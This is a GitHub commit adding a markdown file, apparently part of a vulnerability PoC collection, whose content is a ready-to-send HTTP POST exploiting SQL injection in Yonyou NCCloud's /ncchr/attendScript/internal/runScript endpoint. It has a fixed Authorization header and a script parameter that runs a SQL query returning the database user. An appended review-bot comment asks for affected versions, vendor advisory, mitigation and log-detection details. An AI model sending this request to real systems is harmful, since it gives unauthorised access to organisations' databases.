Create 用友NCCloud系统runScript存在SQL注入漏洞.md

wy876 2024-03-21 18:00:33 +08:00 committed by GitHub
parent 79a46abf4f
commit d87c6726a5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -0,0 +1,18 @@
## 用友NCCloud系统runScript存在SQL注入漏洞
## poc
```
POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Length: 59
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Connection: close
Content-Type: application/x-www-form-urlencoded
key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual
```
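Review bot: The new file goes from the title heading straight into `## poc` with nothing in between, so a reader cannot tell which NCCloud versions are affected, whether a vendor fix exists, or what the impact is beyond what the request implies. Please add a short description section before the request, covering affected versions, the vendor advisory or patch reference if there is one, and a mitigation such as restricting access to `/ncchr/attendScript/internal/runScript`. That path together with a `script` parameter carrying a SQL statement is also what defenders would search for in web and WAF logs, so it is worth stating explicitly. The `Authorization: 58e00466213416018d01d15de83b0198` header is given without explanation; say whether it is a fixed value, a sample, or a placeholder, since that determines whether the endpoint is reachable without credentials. As a style point, `## poc` sits at the same level as the title, so it should be a subheading, and the fence would benefit from a language tag.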